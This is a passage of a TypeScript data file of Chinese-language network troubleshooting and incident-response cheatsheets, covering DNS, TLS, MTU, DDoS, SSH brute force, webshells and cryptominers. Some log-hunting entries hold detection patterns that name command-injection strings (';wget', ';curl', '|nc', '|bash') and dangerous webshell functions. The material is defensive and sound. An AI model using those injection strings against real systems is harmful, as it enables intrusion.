export interface CheatsheetStep {
  title: string;
  desc?: string;
  cmd?: string;
  tool?: string;
}
export type CaseCategory = "network" | "attack" | "system" | "cloud" | "k8s" | "mobile" | "lateral";

export interface Cheatsheet {
  slug: string;
  title: string;
  summary: string;
  category: CaseCategory;
  severity?: "info" | "warn" | "danger";
  tags: string[];
  steps: CheatsheetStep[];
  relatedTools?: string[];
}

export const caseCategories: { slug: CaseCategory; name: string; desc: string; icon: string }[] = [
  { slug: "network",  name: "网络问题排查",   desc: "连通性 / 解析 / 延迟 / 路由 / TLS / 端口",     icon: "Network" },
  { slug: "attack",   name: "攻击事件响应",   desc: "DDoS / 爆破 / 注入 / Webshell / 挖矿 / 勒索 / 数据泄露", icon: "ShieldAlert" },
  { slug: "system",   name: "系统与应用异常", desc: "服务挂 / 资源打满 / 日志异常 / 容器",          icon: "ServerCog" },
  { slug: "cloud",    name: "云安全事件",     desc: "AK 泄漏 / SG 误开 / OSS 桶暴露 / IAM 越权 / 账单异常", icon: "Cloud" },
  { slug: "k8s",      name: "K8s 集群事件",   desc: "Pod 逃逸 / RBAC 越权 / Etcd 泄漏 / 镜像投毒 / 计划任务", icon: "Boxes" },
  { slug: "mobile",   name: "iOS / Android 抓包与逆向", desc: "证书信任 / SSL Pinning / 反抓包 / Frida / 脱壳", icon: "Smartphone" },
  { slug: "lateral",  name: "内网横向排查",   desc: "扫段 / 凭据窃取 / 中继 / 隧道 / 域内提权",     icon: "Waypoints" },
];

export const cheatsheets: Cheatsheet[] = [
  // ==================== 网络问题 ====================
  {
    slug: "domain-cannot-resolve",
    category: "network",
    title: "网站访问不了 · 域名解析异常",
    summary: "从本地 DNS → 公共 DNS → 权威链 → 连通性依次排查",
    tags: ["dns", "解析"],
    steps: [
      { title: "先看本地解析结果", cmd: "dig example.com +short\nnslookup example.com", tool: "dig" },
      { title: "换公共 DNS 对比", desc: "本地和公共 DNS 差异大 → 本地/运营商 DNS 污染", cmd: "dig @8.8.8.8 example.com +short\ndig @1.1.1.1 example.com +short\ndig @223.5.5.5 example.com +short", tool: "dig" },
      { title: "追踪整个解析链", cmd: "dig example.com +trace", tool: "dig" },
      { title: "看 whois / 域名是否过期", cmd: "whois example.com | head -30", tool: "whois" },
      { title: "确认能否连上目标 IP", cmd: "ping -c 4 <ip>\ncurl -v --resolve example.com:443:<ip> https://example.com", tool: "curl" },
      { title: "如需绕过本地缓存", cmd: "# macOS 清 DNS\nsudo dscacheutil -flushcache; sudo killall -HUP mDNSResponder\n# Linux systemd-resolved\nsudo resolvectl flush-caches" },
    ],
  },
  {
    slug: "https-cert-error",
    category: "network",
    title: "浏览器报证书错误 / HTTPS 打不开",
    summary: "定位证书链、有效期、SNI、协议版本",
    tags: ["tls", "https", "证书"],
    steps: [
      { title: "看证书链和有效期", cmd: "echo | openssl s_client -connect example.com:443 -servername example.com 2>/dev/null | openssl x509 -noout -dates -issuer -subject", tool: "openssl" },
      { title: "完整 handshake 诊断", cmd: "openssl s_client -connect example.com:443 -servername example.com -showcerts", tool: "openssl" },
      { title: "查是否有其他签发人签过该域名", cmd: "# 证书透明日志\ncurl -s 'https://crt.sh/?q=example.com&output=json' | jq '.[0:5]'", tool: "crtsh" },
      { title: "综合 TLS 报告", cmd: "testssl.sh --fast https://example.com", tool: "testssl" },
      { title: "第三方交叉验证", cmd: "打开 https://www.ssllabs.com/ssltest/analyze.html?d=example.com", tool: "ssllabs" },
    ],
  },
  {
    slug: "server-slow-latency",
    category: "network",
    title: "服务器延迟高 / 卡顿",
    summary: "分辨到底是网络路径还是服务端问题",
    tags: ["延迟", "抓包", "路由"],
    steps: [
      { title: "端到端 RTT / 丢包", cmd: "ping -c 20 example.com", tool: "ping" },
      { title: "看路径每一跳", desc: "找出丢包/高延迟出现在哪一跳", cmd: "mtr -rwbzc 30 example.com", tool: "mtr" },
      { title: "确认 TCP 能否建连接", cmd: "nc -zv example.com 443\ntcping example.com 443", tool: "netcat" },
      { title: "抓 handshake 看重传/RST", cmd: "sudo tcpdump -ni any host example.com and port 443 -c 200", tool: "tcpdump" },
      { title: "看服务端是不是 CPU/带宽打满", cmd: "# 服务端跑\ntop -bn1 | head -20\niftop -nNP        # 或 nload / bmon" },
    ],
  },
  {
    slug: "port-open-check",
    category: "network",
    title: "服务端口是否开放 · 远端/本机双向验证",
    summary: "远端端口 → 本地监听 → 进程",
    tags: ["端口", "扫描"],
    steps: [
      { title: "远端目标端口探测", cmd: "nc -zv target.host 80 443 8080\n# 或 UDP\nnc -zvu target.host 53", tool: "netcat" },
      { title: "服务/版本识别", cmd: "nmap -sV -Pn -p 80,443,8080 target.host", tool: "nmap" },
      { title: "本机看监听端口", cmd: "sudo lsof -iTCP -sTCP:LISTEN -n -P\nss -tlnp 2>/dev/null || netstat -tlnp", tool: "lsof" },
      { title: "对应到进程/容器", cmd: "sudo lsof -i:8080\ndocker ps --format 'table {{.Names}}\\t{{.Ports}}'" },
    ],
  },
  {
    slug: "packet-loss-hunt",
    category: "network",
    title: "间歇性丢包 / 抖动定位",
    summary: "把丢包点从'感觉'变成'第几跳、第几秒'",
    tags: ["丢包", "抖动"],
    steps: [
      { title: "长时 mtr 记录", desc: "至少跑 5 分钟以捕捉抖动窗口", cmd: "mtr -rwbzc 500 -i 0.5 example.com | tee /tmp/mtr.log", tool: "mtr" },
      { title: "并行 ping 多目标", cmd: "for h in 8.8.8.8 1.1.1.1 example.com; do (ping -c 100 $h > /tmp/ping-$h.log 2>&1 &); done" },
      { title: "看是否 MTU 问题", cmd: "ping -c 4 -M do -s 1472 example.com   # 不通就减 -s\ntracepath example.com" },
      { title: "抓 TCP 重传统计", cmd: "sudo tcpdump -ni any 'tcp[13] & 4 != 0 or tcp[13] & 2 != 0' -c 100", tool: "tcpdump" },
      { title: "看内核 socket 统计", cmd: "ss -s\nnstat -a 2>/dev/null | grep -i 'retrans\\|drop'" },
    ],
  },
  {
    slug: "cdn-source-mismatch",
    category: "network",
    title: "CDN 回源 / 源站与边缘不一致",
    summary: "静态资源过期 / 边缘节点异常时的定位链",
    tags: ["cdn", "回源"],
    steps: [
      { title: "看命中哪个边缘节点", cmd: "curl -sI https://example.com/static.css | grep -iE 'x-cache|via|cf-ray|x-served-by|age'", tool: "curl" },
      { title: "强制直连源站", cmd: "curl -v --resolve example.com:443:<源站IP> https://example.com/static.css", tool: "curl" },
      { title: "对比源站和边缘的 ETag", cmd: "curl -sI https://example.com/x.js | grep -i etag\ncurl -sI --resolve example.com:443:<源站IP> https://example.com/x.js | grep -i etag" },
      { title: "看 CDN 是否被劫持解析到旁站", cmd: "dig example.com +short\ndig example.com.cdn.example.net +short" },
    ],
  },
  {
    slug: "container-network-broken",
    category: "network",
    title: "容器/K8s 内部访问不通",
    summary: "Pod → Service → Ingress 分层定位",
    tags: ["docker", "k8s", "容器"],
    steps: [
      { title: "Pod 里能不能出网", cmd: "kubectl exec -it <pod> -- sh -c 'curl -m 5 https://www.baidu.com; nslookup kubernetes.default'" },
      { title: "跨 Pod DNS 解析", cmd: "kubectl exec -it <pod> -- nslookup my-svc.my-ns.svc.cluster.local" },
      { title: "Service ClusterIP 是否通", cmd: "kubectl get svc\nkubectl exec -it <pod> -- nc -zv <svc-clusterip> <port>" },
      { title: "看 Endpoints 是否为空", cmd: "kubectl get endpoints <svc-name>\nkubectl describe svc <svc-name>" },
      { title: "Ingress / NodePort 侧", cmd: "kubectl get ingress\ncurl -H 'Host: example.com' http://<node-ip>:<nodeport>/" },
    ],
  },
  {
    slug: "ntp-time-drift",
    category: "network",
    title: "时间不同步导致的诡异问题",
    summary: "证书过期误报 / JWT 失效 / K8s 认证失败常见成因",
    tags: ["ntp", "时间"],
    steps: [
      { title: "看本机偏差", cmd: "# macOS\nsntp -sS time.apple.com\n# Linux\nchronyc tracking || timedatectl status" },
      { title: "强制同步一次", cmd: "sudo sntp -sS time.apple.com          # macOS\nsudo chronyc -a makestep               # chronyd\nsudo systemctl restart systemd-timesyncd" },
      { title: "对比多个 NTP 源", cmd: "for s in ntp.aliyun.com time.apple.com pool.ntp.org; do sntp $s | head -1; done" },
    ],
  },

  {
    slug: "connection-refused",
    category: "network",
    title: "connect: connection refused / 端口拒绝连接",
    summary: "分四层定位：服务没起 / 只绑 127.0.0.1 / 防火墙拒 / 安全组拦",
    tags: ["tcp", "端口", "refused"],
    steps: [
      { title: "服务端确认进程在监听", desc: "看到 0.0.0.0:80 或 :::80 才算对外开放；只有 127.0.0.1:80 = 只允许本机连", cmd: "sudo ss -tlnp | grep :80\n# 老系统\nsudo netstat -tlnp | grep :80", tool: "ss" },
      { title: "服务端本地自测", desc: "本地通、外部不通 → 一定是防火墙或云安全组", cmd: "curl -v http://127.0.0.1:80/\ntelnet 127.0.0.1 80", tool: "curl" },
      { title: "客户端做 TCP 探测", desc: "connection refused = 目标机器收到包但没有服务应答；timeout = 包没到目标（防火墙丢包）", cmd: "nc -vz <server-ip> 80\ntimeout 3 bash -c '</dev/tcp/<server-ip>/80' && echo OK || echo FAIL", tool: "nc" },
      { title: "查本机防火墙", cmd: "# Linux firewalld\nsudo firewall-cmd --list-all\n# iptables\nsudo iptables -L INPUT -n -v --line-numbers\n# nftables\nsudo nft list ruleset | grep -A2 dport\n# ubuntu ufw\nsudo ufw status verbose", tool: "iptables" },
      { title: "云主机查安全组", desc: "阿里云/腾讯云/AWS 控制台 → 实例 → 安全组 → 入方向；小白最常忘的一步", cmd: "# 阿里云 CLI\naliyun ecs DescribeSecurityGroupAttribute --SecurityGroupId sg-xxx --RegionId cn-hangzhou" },
      { title: "改绑 0.0.0.0（如果只监听 127.0.0.1）", cmd: "# nginx\nlisten 0.0.0.0:80;\n# python\npython3 -m http.server 80 --bind 0.0.0.0\n# node\napp.listen(80, '0.0.0.0')" },
    ],
    relatedTools: ["nmap", "netcat"],
  },
  {
    slug: "connection-timeout",
    category: "network",
    title: "连接超时 · timeout / no route to host",
    summary: "TCP 握手第一步 SYN 就没回应，从路由 → 防火墙 → 云 ACL 逐层查",
    tags: ["timeout", "tcp", "路由"],
    steps: [
      { title: "先确认基础连通", desc: "ping 通 + 端口 timeout = 大概率防火墙；ping 也不通 = 路由问题", cmd: "ping -c 4 <server-ip>\nnc -vz -w 5 <server-ip> 443", tool: "ping" },
      { title: "traceroute 看在哪跳丢", desc: "最后能看到的那一跳的下一跳就是问题点；连续 *** 通常是运营商拦截或 ICMP 被限速（不代表真的不通）", cmd: "# Linux\nsudo traceroute -T -p 443 <server-ip>\n# macOS TCP 探测\nsudo traceroute -P TCP -p 443 <server-ip>", tool: "traceroute" },
      { title: "mtr 持续观察", desc: "Loss% 集中在某一跳 = 那一跳丢包；只有最后一跳 loss = 目标机器丢包", cmd: "sudo mtr -rwc 30 -P 443 -T <server-ip>", tool: "mtr" },
      { title: "看是否是 SYN 被过滤", desc: "只发不收 = 中间设备吃了；有 RST = 对端明确拒", cmd: "sudo tcpdump -nn -i any host <server-ip> and port 443 -c 20", tool: "tcpdump" },
      { title: "换网络出口验证", desc: "手机热点能连、宽带不能连 = ISP 或本地路由；反之 = 目标端 IP 白名单", cmd: "# 打开手机热点，Mac 切热点\ncurl -v --connect-timeout 5 https://<server>/" },
      { title: "云主机检查", cmd: "# VPC 路由表、NACL、安全组入方向、EIP 绑定状态\n# 阿里云\naliyun vpc DescribeRouteTables --RegionId cn-hangzhou\n# 常见坑：EIP 欠费 / 带宽包过期 / NAT 网关未挂子网" },
    ],
    relatedTools: ["mtr", "traceroute", "tcpdump"],
  },
  {
    slug: "tcp-retransmit-loss",
    category: "network",
    title: "网络时通时不通 · 抓包定位 TCP 重传/丢包",
    summary: "用 tcpdump + Wireshark 看重传率，判断是丢包还是应用慢",
    tags: ["tcpdump", "wireshark", "重传"],
    steps: [
      { title: "服务端抓 60s 流量", cmd: "sudo tcpdump -nn -i any host <client-ip> -w /tmp/cap.pcap &\nsleep 60; sudo kill %1", tool: "tcpdump" },
      { title: "统计重传率", desc: "重传 > 1% 就明显异常；> 5% 用户已经能感受到卡", cmd: "tshark -r /tmp/cap.pcap -q -z io,stat,10,\"tcp.analysis.retransmission\"\ntshark -r /tmp/cap.pcap -Y 'tcp.analysis.retransmission' | wc -l", tool: "wireshark" },
      { title: "看 RTT 波动", desc: "RTT 突然从 30ms 跳到 500ms = 中间链路拥塞", cmd: "tshark -r /tmp/cap.pcap -q -z io,stat,1,\"AVG(tcp.analysis.ack_rtt)tcp.analysis.ack_rtt\"" },
      { title: "看是否有 Zero Window", desc: "接收端处理不过来在告诉发送端「先别发」= 应用消费太慢，不是网络问题", cmd: "tshark -r /tmp/cap.pcap -Y 'tcp.window_size == 0'" },
      { title: "Wireshark 图形化", cmd: "# 本地打开\nwireshark /tmp/cap.pcap\n# 菜单 Statistics → TCP Stream Graph → Round Trip Time / Throughput" },
      { title: "内核层 TCP 统计", cmd: "ss -ti | grep -E 'retrans|rtt'\nnetstat -s | grep -iE 'retrans|drop|reset'" },
    ],
    relatedTools: ["tcpdump", "wireshark"],
  },
  {
    slug: "mtu-blackhole",
    category: "network",
    title: "小包通大包卡 · MTU 黑洞排查",
    summary: "SSH 能连但 scp 卡死、SSL 握手一半断——典型 MTU/PMTUD 问题",
    tags: ["mtu", "分片", "pmtud"],
    steps: [
      { title: "先复现症状", desc: "ping 小包通、大包不通 = MTU 问题实锤", cmd: "ping -c 3 -s 56  <target>    # 84 字节，通\nping -c 3 -s 1400 <target>   # 1428 字节，可能通\nping -c 3 -s 1472 <target>   # 1500 字节，通常这里断" },
      { title: "禁分片探测最大 MTU", desc: "从 1472 往下试，能通的最大值 + 28 = 实际 MTU", cmd: "# Linux\nping -M do -s 1472 -c 3 <target>\nping -M do -s 1400 -c 3 <target>\n# macOS\nping -D -s 1472 <target>" },
      { title: "看本机接口 MTU", cmd: "ip link show | grep mtu\nifconfig | grep -i mtu", tool: "ip" },
      { title: "临时降 MTU 验证", desc: "常见值：VPN 1420 / PPPoE 1492 / 隧道封装 1400", cmd: "sudo ip link set dev eth0 mtu 1400   # Linux\nsudo ifconfig en0 mtu 1400            # macOS" },
      { title: "永久配置", cmd: "# Linux (NetworkManager)\nsudo nmcli con mod \"有线连接 1\" 802-3-ethernet.mtu 1400\n# TCP MSS clamp（网关侧）\nsudo iptables -t mangle -A FORWARD -p tcp --tcp-flags SYN,RST SYN -j TCPMSS --clamp-mss-to-pmtu" },
      { title: "常见触发场景", desc: "GRE/IPsec/WireGuard/GCP 云内网/多层 NAT" },
    ],
  },
  {
    slug: "arp-ip-conflict",
    category: "network",
    title: "IP 冲突 / 网关 ARP 异常",
    summary: "同一 IP 被两台机器抢，或网关 MAC 突然变了",
    tags: ["arp", "冲突", "网关"],
    steps: [
      { title: "看本机 ARP 表", desc: "同一 IP 出现两个 MAC = 有冲突；网关 MAC 变化 = 可能被 ARP 欺骗", cmd: "arp -an\nip neigh show", tool: "ip" },
      { title: "看系统日志报冲突", cmd: "# Linux\nsudo dmesg | grep -i 'arp\\|duplicate'\nsudo journalctl -k | grep -i duplicate\n# macOS\nlog show --last 10m --predicate 'process == \"kernel\"' | grep -i arp" },
      { title: "扫本网段找出对手", desc: "看谁抢了这个 IP、他的 MAC 属于哪个厂商", cmd: "sudo arp-scan --interface=eth0 --localnet\nsudo nmap -sn 192.168.1.0/24", tool: "arp-scan" },
      { title: "抓包定位 gratuitous ARP", cmd: "sudo tcpdump -nn -e -i any arp", tool: "tcpdump" },
      { title: "临时清 ARP 缓存", cmd: "# Linux\nsudo ip neigh flush all\n# macOS\nsudo arp -a -d" },
      { title: "根因修复", desc: "① DHCP 池冲突 → 缩池或做绑定 ② 静态 IP 撞车 → 改一个 ③ 疑似 ARP 欺骗 → 交换机做 DAI（Dynamic ARP Inspection）" },
    ],
  },
  {
    slug: "wifi-slow-diagnose",
    category: "network",
    title: "Wi-Fi 慢/断流诊断",
    summary: "信号 / 信道干扰 / 频段 / 漫游 / DNS 五个维度",
    tags: ["wifi", "无线", "慢"],
    steps: [
      { title: "看当前连的 AP 信号", desc: "RSSI > -60 dBm 优 / -70 可用 / < -75 明显慢", cmd: "# macOS（Sonoma 前）\n/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -I\n# Sonoma+ 用系统信息\nsystem_profiler SPAirPortDataType | grep -A5 Current\n# Linux\niw dev wlan0 link" },
      { title: "扫周围信道占用", desc: "同信道 3 家以上 = 挤；2.4G 只用 1/6/11 不冲突", cmd: "sudo airport -s\nsudo iw dev wlan0 scan | grep -E 'signal|freq|SSID'" },
      { title: "跑速测", desc: "有线 200Mbps + Wi-Fi 20Mbps = 无线问题；两个都低 = 上游或 ISP", cmd: "speedtest-cli --simple\niperf3 -c <本地路由 iperf 端> -t 10" },
      { title: "5GHz 强制", desc: "路由器把 2.4G 和 5G 拆成不同 SSID，手动连 5G 那个" },
      { title: "换信道宽度", desc: "路由后台把 5G 从 20MHz 提到 80/160MHz；2.4G 反而降到 20MHz 减干扰" },
      { title: "DNS 慢导致「以为网慢」", cmd: "dig google.com | grep 'Query time'\n# > 100ms 换 DNS\nnetworksetup -setdnsservers Wi-Fi 223.5.5.5 119.29.29.29" },
    ],
  },
  {
    slug: "clash-proxy-broken",
    category: "network",
    title: "Clash / 代理不通 · 分流规则命中错误",
    summary: "确认代理进程 / TUN / 规则命中 / DNS 泄漏",
    tags: ["clash", "proxy", "代理"],
    steps: [
      { title: "确认代理端口在监听", cmd: "lsof -iTCP:7897 -sTCP:LISTEN\ncurl -x http://127.0.0.1:7897 -sI https://www.google.com" },
      { title: "看系统代理有没有设对", cmd: "# macOS 全局代理状态\nscutil --proxy\n# 环境变量\necho $http_proxy $https_proxy $ALL_PROXY" },
      { title: "测规则命中", desc: "看 Clash Dashboard → Connections，实时看每条请求走了哪个节点或 DIRECT", cmd: "# API 拉当前连接\ncurl -s http://127.0.0.1:9090/connections | jq '.connections[] | {host, rule, chains}'" },
      { title: "查 DNS 泄漏", desc: "国内域名走了代理 = 慢；国外域名走了 DIRECT = 不通", cmd: "curl -s --resolve www.google.com:443:1.1.1.1 https://www.google.com -o /dev/null -w '%{http_code}\\n'\ndig @127.0.0.1 -p 53 google.com" },
      { title: "TUN 模式打不开的兜底", cmd: "# macOS 要给 Clash 授予 TUN 权限\nsudo /Applications/Clash\\ Verge.app/Contents/MacOS/Clash\\ Verge --grant-permission\n# 或改回 System Proxy 模式" },
      { title: "换节点批量测速", cmd: "curl -s http://127.0.0.1:9090/proxies | jq '.proxies | keys' | head" },
    ],
  },
  {
    slug: "ipv6-partial-fail",
    category: "network",
    title: "IPv6 半通 · 部分网站慢或打不开",
    summary: "系统偏好 IPv6，但 IPv6 没真通，Happy Eyeballs 超时后才回落",
    tags: ["ipv6", "happy eyeballs"],
    steps: [
      { title: "看是否拿到公网 IPv6", desc: "有 2xxx: 开头才是公网 v6；只有 fe80:: 是本地 link", cmd: "# macOS\nifconfig | grep 'inet6' | grep -v fe80 | grep -v '::1'\n# Linux\nip -6 addr show scope global" },
      { title: "测 v6 出口", cmd: "curl -6 -v https://ipv6.google.com\ncurl -s https://test-ipv6.com/ip/?callback=x" },
      { title: "对比 v4/v6 延迟", cmd: "ping6 -c 5 ipv6.google.com\nping  -c 5 ipv4.google.com" },
      { title: "看 DNS 有没有返回 AAAA", cmd: "dig www.example.com A     +short\ndig www.example.com AAAA  +short" },
      { title: "临时禁 IPv6 验证", cmd: "# macOS\nnetworksetup -setv6off Wi-Fi\n# Linux\nsudo sysctl -w net.ipv6.conf.all.disable_ipv6=1" },
      { title: "根因", desc: "运营商 IPv6 半开通 / 路由器丢 v6 / 云主机没开 v6。修完记得开回，别一直裸奔 v4" },
    ],
  },
  {
    slug: "bandwidth-saturation",
    category: "network",
    title: "带宽被打满 · 找出谁在吃流量",
    summary: "先看总量 → 定位进程 → 定位连接 → 抓包看内容",
    tags: ["带宽", "iftop", "nethogs"],
    steps: [
      { title: "看接口总带宽", cmd: "# 实时\nsudo iftop -i eth0 -n\nsudo nload eth0\n# 历史\nsar -n DEV 1 5", tool: "iftop" },
      { title: "定位是哪个进程在吃", cmd: "sudo nethogs eth0\nsudo iotop -oPa   # 磁盘 IO 顺便看" },
      { title: "看具体是哪些连接", cmd: "sudo ss -tunap | awk 'NR>1 {print $6}' | sort | uniq -c | sort -rn | head\nsudo iftop -i eth0 -P -N -n" },
      { title: "反查对端 IP 归属", cmd: "curl -s https://ipinfo.io/<ip>\nwhois <ip> | grep -iE 'orgname|country|netname'" },
      { title: "看是不是被扫或被打", cmd: "sudo tcpdump -nn -i eth0 -c 200 'tcp[tcpflags] & tcp-syn != 0 and tcp[tcpflags] & tcp-ack == 0' | awk '{print $3}' | cut -d. -f1-4 | sort | uniq -c | sort -rn | head" },
      { title: "限流兜底", cmd: "# 单进程用 trickle\ntrickle -d 1024 -u 512 <cmd>\n# 全局 tc\nsudo tc qdisc add dev eth0 root tbf rate 100mbit burst 10kb latency 50ms" },
    ],
    relatedTools: ["iftop", "nethogs"],
  },
  {
    slug: "http-slow-diagnose",
    category: "network",
    title: "网站慢 · curl 分段耗时定位瓶颈",
    summary: "把「打开慢」拆成 DNS/TCP/TLS/首字节/下载 5 段耗时",
    tags: ["curl", "延迟", "http"],
    steps: [
      { title: "一行 curl 出 5 段耗时", desc: "namelookup = DNS；connect - namelookup = TCP；appconnect - connect = TLS；starttransfer - appconnect = 服务端处理（后端慢）；total - starttransfer = 下载", cmd: "curl -o /dev/null -s -w 'dns:%{time_namelookup}\\nconnect:%{time_connect}\\ntls:%{time_appconnect}\\nttfb:%{time_starttransfer}\\ntotal:%{time_total}\\n' https://example.com/", tool: "curl" },
      { title: "对照参考值", desc: "国内正常：DNS<50ms、TCP<50ms、TLS<150ms、TTFB<300ms。任何一段超标 → 定位那一层" },
      { title: "DNS 慢 → 换 DNS 或走 hosts", cmd: "dig example.com | grep 'Query time'\n# 临时绕过\ncurl --resolve example.com:443:<ip> https://example.com/" },
      { title: "TCP 慢 → 走跨境或链路差", cmd: "mtr -rwc 20 -T -P 443 example.com" },
      { title: "TLS 慢 → 证书链/OCSP", cmd: "openssl s_client -connect example.com:443 -servername example.com < /dev/null 2>&1 | grep -E 'Verify|Session-|Protocol'" },
      { title: "TTFB 慢 → 后端问题，服务端接力", cmd: "# 在服务端\ntop -o %CPU\nsudo tail -f /var/log/nginx/access.log | awk '{print $NF}'    # 看 upstream_response_time" },
      { title: "下载慢 → 带宽或 CDN 回源", cmd: "curl -o /dev/null https://example.com/big.bin -w '%{speed_download}\\n'" },
    ],
    relatedTools: ["curl", "mtr"],
  },

  // ==================== 攻击事件响应 ====================
  {
    slug: "ddos-under-fire",
    category: "attack",
    severity: "danger",
    title: "网站正在被 DDoS · 应急止血",
    summary: "先看攻击类型 / 量级，再决定挡在哪一层",
    tags: ["ddos", "应急"],
    steps: [
      { title: "确认攻击层：L3/4 还是 L7", cmd: "# 服务器视角看连接数暴涨\nss -s\nss -Htan state syn-recv | wc -l           # SYN flood\nss -Htan state established | wc -l", tool: "ss" },
      { title: "抓 60s 流量看 TOP 源 IP", cmd: "sudo timeout 60 tcpdump -ni any -w /tmp/attack.pcap 'port 80 or port 443'\ntshark -r /tmp/attack.pcap -T fields -e ip.src | sort | uniq -c | sort -rn | head -20", tool: "tshark" },
      { title: "L7 CC 攻击 → 找热点 URL / UA", cmd: "rg -o '\"\\S+ \\S+' /var/log/nginx/access.log | sort | uniq -c | sort -rn | head\nrg -o 'HTTP/[0-9.]+\"[^\"]+\"[^\"]+\"[^\"]+\"' /var/log/nginx/access.log | ..." },
      { title: "限速 / 封禁 IP（快速止血）", cmd: "# iptables 限速\nsudo iptables -I INPUT -p tcp --dport 443 -m connlimit --connlimit-above 100 -j DROP\n# 封单 IP\nsudo iptables -I INPUT -s 1.2.3.4 -j DROP\n# 批量封\ncat bad_ips.txt | xargs -I{} sudo iptables -I INPUT -s {} -j DROP" },
      { title: "上游层挡（CDN/WAF）", desc: "自建通常挡不住，用 CDN 的 WAF/DDoS 高防", cmd: "# 阿里云: 高防IP / 腾讯云: T-Sec\n# CloudFlare: Under Attack Mode\n# 把 A 记录切到高防线路" },
      { title: "留证据", cmd: "cp /var/log/nginx/access.log /var/log/attack-$(date +%F).log\nsudo cp /tmp/attack.pcap /var/log/" },
    ],
  },
  {
    slug: "ssh-brute-force",
    category: "attack",
    severity: "warn",
    title: "SSH 爆破 · 失败登录暴增",
    summary: "定位攻击源 → 封禁 → 加固",
    tags: ["爆破", "ssh"],
    steps: [
      { title: "看失败登录 TOP IP", cmd: "sudo journalctl -u ssh -u sshd --since '1 hour ago' | rg 'Failed password' | rg -oP 'from \\K\\S+' | sort | uniq -c | sort -rn | head", tool: "journalctl" },
      { title: "或读老式 auth.log", cmd: "sudo rg 'Failed password' /var/log/auth.log | rg -oP 'from \\K\\S+' | sort | uniq -c | sort -rn | head", tool: "ripgrep" },
      { title: "看是否有成功登录", desc: "如果既有大量失败又出现成功 → 高度可疑", cmd: "sudo journalctl -u ssh --since '1 hour ago' | rg 'Accepted'" },
      { title: "启用 fail2ban 自动封禁", cmd: "sudo apt install fail2ban -y\nsudo systemctl enable --now fail2ban\nsudo fail2ban-client status sshd", tool: "fail2ban" },
      { title: "加固 sshd_config", cmd: "sudo sed -i 's/^#PermitRootLogin.*/PermitRootLogin no/' /etc/ssh/sshd_config\nsudo sed -i 's/^#PasswordAuthentication.*/PasswordAuthentication no/' /etc/ssh/sshd_config\nsudo systemctl restart sshd" },
      { title: "改端口 / 上跳板", cmd: "# /etc/ssh/sshd_config\nPort 2222\n# 加上 AllowUsers deploy admin" },
    ],
  },
  {
    slug: "web-attack-nginx-log",
    category: "attack",
    severity: "warn",
    title: "Web 攻击痕迹排查（access.log）",
    summary: "从日志里揪出 SQL 注入 / XSS / 扫描 / 目录遍历",
    tags: ["日志", "web", "取证"],
    steps: [
      { title: "SQL 注入特征", cmd: "rg -iE 'union.*select|select.+from|sleep\\(|benchmark\\(|or 1=1|and 1=1' /var/log/nginx/access.log | head -20", tool: "ripgrep" },
      { title: "XSS 特征", cmd: "rg -iE '<script|onerror=|onload=|javascript:|alert\\(|document\\.cookie' /var/log/nginx/access.log | head -20" },
      { title: "目录遍历 / 敏感路径", cmd: "rg -E '\\.\\./|/etc/passwd|/proc/self|\\.git/|\\.env|\\.svn/|/wp-admin|/phpmyadmin' /var/log/nginx/access.log | head -20" },
      { title: "命令注入 / RCE", cmd: "rg -iE ';cat |;wget |;curl |\\|nc |\\|bash|/bin/sh|\\$\\(.*\\)|`.*`' /var/log/nginx/access.log | head -20" },
      { title: "扫描器指纹", cmd: "rg -iE 'nikto|sqlmap|nmap|acunetix|nessus|masscan|whatweb|dirbuster|gobuster' /var/log/nginx/access.log" },
      { title: "看攻击者最活跃 IP + 时间线", cmd: "rg -iE 'union|select|<script|\\.\\./|/etc/passwd' /var/log/nginx/access.log | rg -oE '^\\S+' | sort | uniq -c | sort -rn | head" },
    ],
  },
  {
    slug: "webshell-hunt",
    category: "attack",
    severity: "danger",
    title: "疑似被上传 Webshell · 定位与清除",
    summary: "静态特征 + 时间线 + 反连行为三管齐下",
    tags: ["webshell", "入侵"],
    steps: [
      { title: "近 24h 新增的 PHP/JSP 文件", cmd: "find /var/www -type f \\( -name '*.php' -o -name '*.jsp' -o -name '*.aspx' \\) -mtime -1 -ls" },
      { title: "危险函数扫", cmd: "rg -n --no-ignore -E 'eval\\(|assert\\(|system\\(|passthru\\(|shell_exec\\(|base64_decode\\(|preg_replace.*\\/e|Runtime\\.getRuntime' /var/www 2>/dev/null | head -50" },
      { title: "小体积可疑文件（一句话）", cmd: "find /var/www -type f -name '*.php' -size -2k -exec grep -l 'eval\\|assert\\|base64_decode' {} \\;" },
      { title: "看是否有反连", cmd: "sudo netstat -tnpa | rg ESTABLISHED | rg -v ':22 \\|:443 \\|:80 '\nsudo lsof -i -n -P | rg -i 'nc\\|bash\\|php\\|python\\|perl'" },
      { title: "检查 crontab / 计划任务", cmd: "for u in $(cut -f1 -d: /etc/passwd); do echo == $u ==; sudo crontab -u $u -l 2>/dev/null; done\nls -la /etc/cron.*/ /var/spool/cron/" },
      { title: "隔离 + 保留证据", cmd: "sudo mv suspicious.php /root/quarantine/\nsudo tar czf /root/webshell-evidence-$(date +%F).tgz /var/www /var/log/nginx" },
    ],
  },
  {
    slug: "cryptomining-hijack",
    category: "attack",
    severity: "danger",
    title: "服务器变矿机 · 挖矿木马定位",
    summary: "CPU 打满 + 高流量 + 奇怪进程",
    tags: ["挖矿", "入侵"],
    steps: [
      { title: "看是谁把 CPU 吃满", cmd: "top -bn1 -o %CPU | head -25\nps -eo pid,ppid,user,%cpu,%mem,cmd --sort=-%cpu | head -15" },
      { title: "看是否连接矿池", desc: "常见矿池端口 3333/4444/5555/7777/14444/45560", cmd: "sudo lsof -i -n -P | rg -E ':(3333|4444|5555|7777|14444|45560)'\nsudo ss -tnp | rg -E ':(3333|4444|5555|7777|14444)'" },
      { title: "看进程真实路径 + hash", cmd: "sudo ls -la /proc/<pid>/exe\nsudo cat /proc/<pid>/cmdline; echo\nsudo sha256sum /proc/<pid>/exe" },
      { title: "查该 hash 是否已知恶意", cmd: "# 拿 sha256 去 VirusTotal 或微步在线查\n# https://www.virustotal.com/gui/search/<sha256>\n# https://s.threatbook.com/#/domain/<sha256>" },
      { title: "看是不是 systemd/cron 持久化", cmd: "sudo systemctl list-unit-files --state=enabled | head\nls -la /etc/systemd/system/ /etc/cron.*/ ~/.config/systemd/user/ 2>/dev/null\nls -la /root/.ssh/authorized_keys /home/*/.ssh/authorized_keys" },
